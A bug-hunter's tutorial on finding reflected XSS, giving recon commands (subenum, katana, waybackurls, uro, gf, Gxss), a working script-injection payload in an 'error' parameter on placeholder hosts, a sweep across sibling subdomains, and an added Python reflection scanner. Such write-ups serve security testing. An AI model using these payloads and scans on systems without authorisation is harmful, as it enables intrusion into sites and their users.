How I got multiple easy RXSS
Peace be upon you (Assalamualaikum), guys! My name is Abdelrahem Mekky (0xmekky) and I have found multiple Reflected XSS vulnerabilities.
If you do not know what XSS is, you can read about it here.
Let me explain how I found multiple RXSS vulnerabilities.
1- First, enumerate and collect the subdomains with the SubEnum tool (-r probes the results so only hosts that answer over HTTP/HTTPS are kept):
subenum -d target.com -r
2- Now gather endpoints. katana crawls the live hosts (-jc also parses JavaScript files for endpoints), and waybackurls pulls archived URLs from the Wayback Machine and Common Crawl. Both append to the same file:
cat subdomains.txt | katana -jc >> Endpoints.txt
cat subdomains.txt | waybackurls >> Endpoints.txt
3- Most of these URLs are duplicates, or differ only in parameter values, so deduplicate them with the uro tool:
cat Endpoints.txt | uro >> Endpoints_Final.txt
4- Keep only the URLs whose parameter names are commonly vulnerable to XSS, using the gf tool's xss pattern:
cat Endpoints_Final.txt | gf xss >> XSS.txt
5- Then use the Gxss tool to find parameters whose values are reflected in the response (-p sets the probe string that is substituted into every parameter value):
cat XSS.txt | Gxss -p khXSS -o XSS_Reflected.txt
Once we know which parameter values are reflected in the response, the candidates go to manual testing.
6- Let's get started with manual testing. Each parameter gets its own marker (mekky1, mekky2, ...) so that whatever shows up in the page can be traced back to the exact parameter that reflected it:
https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
7- The error parameter is reflected without HTML encoding, so any JavaScript payload injected there executes. The leading > closes the element the value lands in, and the script tag follows, e.g.:
JavaScript payload: mekky2><script>alert("0xmekky")</script>
URL: https://subsubsub.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
8- I noticed in the subdomains file that there are many subdomains sitting under one sub-subdomain, e.g.:
Sub-subdomain: subsub.test.exap.com
Subdomains under that sub-subdomain:
1- new.subsub.test.exap.com
2- new2.subsub.test.exap.com
3- new3.subsub.test.exap.com
etc.
9- Filter the file with grep for that suffix to extract everything underneath subsub.test.exap.com:
cat subdomains.txt | grep "subsub.test.exap.com"
The result:
new.subsub.test.exap.com
new2.subsub.test.exap.com
new3.subsub.test.exap.com
I also noticed that they all serve the same page as subsub.test.exap.com.
10- With those subdomains collected:
new.subsub.test.exap.com
new2.subsub.test.exap.com
new3.subsub.test.exap.com
I tried the same endpoint, with the same payload, on every one of them:
new.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
new2.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
new3.subsub.test.exap.com/?edit-menu-item=mekky1&error=mekky2><script>alert("0xmekky")</script>&post_title=mekky3&x=mekky4&down=mekky5&state=mekky6&data=mekky7&auth=mekky8&themes=mekky9&captcha=mekky10&nickname=mekky11&allusers=mekky12&color=mekky13&path=mekky14
The payload executed successfully on each of these subdomains, because they all run the same application as subsub.test.exap.com.
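The two ideas this write-up rests on, "which parameter is reflected, and does it come back unencoded?" (steps 5 to 7) and "replay the same request on every sibling host that serves the same app" (steps 8 to 10), are scripted below as an added example; it is not the author's tooling nor Gxss itself. The HTTP fetch is injected as a function, so the script runs offline against a constructed fake page that mimics the symptoms described above (hosts under subsub.test.exap.com echo error raw, HTML-escape post_title, and ignore the rest). The hostnames, parameter names, the zq1zq markers and the fake page are all assumptions for illustration.

```python
"""Added example (not the author's tooling): the reflection-and-context check
behind steps 5-7, then the sibling-subdomain sweep from steps 8-10.

The HTTP fetch is injected as a function so the logic runs offline against a
constructed fake page; pass e.g. `lambda u: requests.get(u, timeout=10).text`
to run it against a target you are authorised to test."""
import html
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

BREAKOUT = '"<>'  # the characters a value must keep to escape an attribute/tag


def marked_query(query):
    """Give every parameter its own marker, like mekky1..mekky14 in the post,
    plus the breakout characters. Returns (new_query, {param: marker})."""
    pairs, markers = [], {}
    for i, (name, _) in enumerate(parse_qsl(query, keep_blank_values=True), 1):
        marker = f"zq{i}zq"  # assumed marker; 'zq1zq' is not a prefix of 'zq10zq'
        markers[name] = marker
        pairs.append((name, marker + BREAKOUT))
    return urlencode(pairs), markers


def classify(body, marker):
    """unescaped: marker and the raw breakout chars came back verbatim
    escaped:   marker came back but < > " were encoded or stripped
    none:      the value is not reflected at all"""
    if marker + BREAKOUT in body:
        return "unescaped"
    if marker in body:
        return "escaped"
    return "none"


def check_reflections(url, fetch):
    """One request with all parameters marked; returns {param: classification}."""
    parts = urlsplit(url)
    query, markers = marked_query(parts.query)
    body = fetch(urlunsplit(parts._replace(query=query)))
    return {name: classify(body, marker) for name, marker in markers.items()}


def siblings(subdomains, parent):
    """Step 9's grep, done strictly: only hosts that are `parent` or end in
    '.<parent>' (a plain grep would also match 'xsubsub.test.exap.com')."""
    return sorted(h for h in subdomains if h == parent or h.endswith("." + parent))


def sweep_hosts(hosts, template_url, fetch):
    """Step 10: replay the same path and query on every sibling host.
    Returns {host: [parameters reflected unescaped]}."""
    parts = urlsplit(template_url)
    report = {}
    for host in hosts:
        result = check_reflections(urlunsplit(parts._replace(netloc=host)), fetch)
        report[host] = sorted(p for p, c in result.items() if c == "unescaped")
    return report


def fake_fetch(url):
    """Constructed stand-in for HTTP GET, modelled on the post's symptoms:
    hosts under subsub.test.exap.com echo `error` raw (the bug), `post_title`
    is HTML-escaped everywhere, other parameters are never reflected, and the
    unrelated host other.test.exap.com escapes `error` too."""
    parts = urlsplit(url)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    err = params.get("error", "")
    if not parts.hostname.endswith("subsub.test.exap.com"):
        err = html.escape(err)
    title = html.escape(params.get("post_title", ""))
    return f"<div class='notice'>{err}</div><h1>{title}</h1>"


if __name__ == "__main__":
    # constructed stand-in for subdomains.txt
    found = ["new2.subsub.test.exap.com", "other.test.exap.com",
             "new.subsub.test.exap.com", "subsub.test.exap.com",
             "new3.subsub.test.exap.com"]
    hosts = siblings(found, "subsub.test.exap.com")
    base = "https://subsub.test.exap.com/?edit-menu-item=a&error=b&post_title=c&x=d"
    print(check_reflections(base, fake_fetch))
    print(sweep_hosts(hosts + ["other.test.exap.com"], base, fake_fetch))
```

"unescaped" in an HTML body is exactly what the ><script> payload above needs; a value reflected inside a JavaScript string or a URL attribute needs different breakout characters, so treat the classification as a triage result and still confirm the context by hand before reporting.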